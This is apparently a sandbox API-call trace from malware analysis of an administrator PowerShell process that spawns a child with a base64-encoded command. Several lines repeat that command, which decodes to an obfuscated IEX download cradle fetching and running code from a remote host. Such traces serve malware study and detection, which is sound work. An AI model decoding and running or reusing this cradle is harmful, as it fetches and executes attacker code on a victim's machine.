	[0327.728] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.728] SetErrorMode (uMode=0x1) returned 0x1
	[0327.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.728] SetErrorMode (uMode=0x1) returned 0x1
	[0327.728] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.729] SetErrorMode (uMode=0x1) returned 0x1
	[0327.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.729] SetErrorMode (uMode=0x1) returned 0x1
	[0327.729] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.729] SetErrorMode (uMode=0x1) returned 0x1
	[0327.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.730] SetErrorMode (uMode=0x1) returned 0x1
	[0327.730] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.730] SetErrorMode (uMode=0x1) returned 0x1
	[0327.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.730] SetErrorMode (uMode=0x1) returned 0x1
	[0327.730] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.731] SetErrorMode (uMode=0x1) returned 0x1
	[0327.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.731] SetErrorMode (uMode=0x1) returned 0x1
	[0327.731] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.731] SetErrorMode (uMode=0x1) returned 0x1
	[0327.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.732] SetErrorMode (uMode=0x1) returned 0x1
	[0327.732] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.732] SetErrorMode (uMode=0x1) returned 0x1
	[0327.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.732] SetErrorMode (uMode=0x1) returned 0x1
	[0327.733] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.733] SetErrorMode (uMode=0x1) returned 0x1
	[0327.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.733] SetErrorMode (uMode=0x1) returned 0x1
	[0327.733] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.734] SetErrorMode (uMode=0x1) returned 0x1
	[0327.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.734] SetErrorMode (uMode=0x1) returned 0x1
	[0327.734] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.734] SetErrorMode (uMode=0x1) returned 0x1
	[0327.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.735] SetErrorMode (uMode=0x1) returned 0x1
	[0327.735] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.735] SetErrorMode (uMode=0x1) returned 0x1
	[0327.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.735] SetErrorMode (uMode=0x1) returned 0x1
	[0327.735] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.736] SetErrorMode (uMode=0x1) returned 0x1
	[0327.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.736] SetErrorMode (uMode=0x1) returned 0x1
	[0327.736] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x4645f0
	[0327.737] FindNextFileW (in: hFindFile=0x4645f0, lpFindFileData=0x1c8cdbb0 | out: lpFindFileData=0x1c8cdbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0327.738] FindClose (in: hFindFile=0x4645f0 | out: hFindFile=0x4645f0) returned 1
	[0327.738] SetErrorMode (uMode=0x1) returned 0x1
	[0328.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c8cdcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0328.288] SetErrorMode (uMode=0x1) returned 0x1
	[0328.288] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c8cded0 | out: lpFileInformation=0x1c8cded0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0328.288] SetErrorMode (uMode=0x1) returned 0x1
	[0328.756] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0328.756] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0328.756] CoTaskMemFree (pv=0x4aeab0) 
	[0329.335] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0329.335] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.335] CoTaskMemFree (pv=0x4aeab0) 
	[0329.338] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0329.338] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.338] CoTaskMemFree (pv=0x4aeab0) 
	[0329.348] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0329.348] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.348] CoTaskMemFree (pv=0x4aeab0) 
	[0329.953] CoTaskMemAlloc (cb=0x3b) returned 0x1b7aac20
	[0330.510] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c8ce0b8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c8ce0b8) returned 0x4550
	[0330.511] CoTaskMemFree (pv=0x1b7aac20) 
	[0330.514] GetConsoleWindow () returned 0x501be
	[0330.520] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0330.521] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0330.521] CoTaskMemFree (pv=0x4aeab0) 
	[0330.521] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0330.521] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0330.521] CoTaskMemFree (pv=0x4aeab0) 
	[0330.526] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0330.526] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0330.526] CoTaskMemFree (pv=0x4aeab0) 
	[0330.528] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c8ce100 | out: pNumArgs=0x1c8ce100) returned 0x1b7b2cb0*=""
	[0330.529] lstrlenW (lpString="-EncodedCommand") returned 15
	[0330.530] CoTaskMemAlloc (cb=0x22) returned 0x1b7b74a0
	[0330.530] RtlMoveMemory (in: Destination=0x1b7b74a0, Source=0x1b7b2cd2, Length=0x20 | out: Destination=0x1b7b74a0) 
	[0330.530] CoTaskMemFree (pv=0x1b7b74a0) 
	[0330.530] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0330.530] CoTaskMemAlloc (cb=0x2f4) returned 0x1b7b2ff0
	[0330.530] RtlMoveMemory (in: Destination=0x1b7b2ff0, Source=0x1b7b2cf2, Length=0x2f2 | out: Destination=0x1b7b2ff0) 
	[0330.530] CoTaskMemFree (pv=0x1b7b2ff0) 
	[0330.531] LocalFree (hMem=0x1b7b2cb0) returned 0x0
	[0331.169] CoTaskMemAlloc (cb=0x804) returned 0x1b7b2cb0
	[0331.169] GetConsoleTitleW (in: lpConsoleTitle=0x1b7b2cb0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0331.169] CoTaskMemFree (pv=0x1b7b2cb0) 
	[0331.210] CoTaskMemAlloc (cb=0x38e) returned 0x1b7b2cb0
	[0331.210] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c8ce060*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2f44f38 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2f44f38*(hProcess=0x36c, hThread=0x368, dwProcessId=0xf18, dwThreadId=0xf1c)) returned 1
	[0331.488] CoTaskMemFree (pv=0x1b7b2cb0) 
	[0331.489] CloseHandle (hObject=0x368) returned 1
	[0331.489] CoTaskMemAlloc (cb=0x3b) returned 0x1b7aac20
	[0331.489] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c8ce108, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c8ce108) returned 0x4550
	[0331.490] CoTaskMemFree (pv=0x1b7aac20) 
	[0332.367] GetCurrentProcess () returned 0xffffffffffffffff
	[0332.367] GetCurrentProcess () returned 0xffffffffffffffff
	[0332.368] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x36c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c8ce1e8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c8ce1e8*=0x368) returned 1

Process:
	id = "4"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x33fbf000"
	os_pid = "0x80c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 29
	os_tid = 0x820

	[0241.323] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0242.379] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0242.380] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0242.380] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0242.380] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0245.827] GetVersionExW (in: lpVersionInformation=0x16dd80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dd80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0245.829] GetVersionExW (in: lpVersionInformation=0x16dd80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dd80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0245.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.841] GetVersionExW (in: lpVersionInformation=0x16daf0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16daf0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0245.841] SetErrorMode (uMode=0x1) returned 0x1
	[0245.842] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16dc50 | out: lpFileInformation=0x16dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0245.843] SetErrorMode (uMode=0x1) returned 0x1
